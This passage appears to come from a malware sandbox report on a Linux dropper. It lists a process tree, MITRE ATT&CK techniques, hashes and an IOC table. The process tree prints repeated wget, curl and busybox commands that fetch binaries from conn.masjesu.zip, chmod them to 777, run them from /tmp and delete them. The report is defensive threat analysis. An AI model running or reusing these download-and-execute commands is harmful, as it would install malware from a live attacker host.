  rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  PID:978
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - System Network Configuration Discovery
  PID:979
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:980
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  PID:982
- /bin/chmod
  chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - File and Directory Permissions Modification
  PID:983
- /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  ./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Executes dropped EXE
  PID:984
- /bin/rm
  rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  PID:985
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  PID:986
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:987
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - System Network Configuration Discovery
  PID:989
- /bin/chmod
  chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - File and Directory Permissions Modification
  PID:990
- /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  ./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Executes dropped EXE
  PID:991
- /bin/rm
  rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  PID:992
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:993
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:994
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:996
- /bin/chmod
  chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - File and Directory Permissions Modification
  PID:997
- /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  ./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Executes dropped EXE
  PID:998
- /bin/rm
  rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  PID:999
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:1000
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1001
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /bin/chmod
  chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - File and Directory Permissions Modification
  PID:1004
- /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  ./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Executes dropped EXE
  PID:1005
- /bin/rm
  rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  PID:1006
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:1007
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1008
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:1010
- /bin/chmod
  chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - File and Directory Permissions Modification
  PID:1011
- /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  ./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Executes dropped EXE
  PID:1012
- /bin/rm
  rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  PID:1013
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - System Network Configuration Discovery
  PID:1014
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1015
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - System Network Configuration Discovery
  PID:1017
- /bin/chmod
  chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - File and Directory Permissions Modification
  PID:1018
- /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  ./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Executes dropped EXE
  PID:1019
- /bin/rm
  rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	752	jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	759	vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	797	vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	818	I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	841	MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	862	zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	869	ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	876	YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	886	Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	893	MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	900	Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	907	hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	914	W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	921	RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	928	ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	935	YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	942	Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	949	MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	956	Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	963	hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	970	W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	977	RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	984	jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	991	vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	998	vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	1005	I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	1012	MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	1019	zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I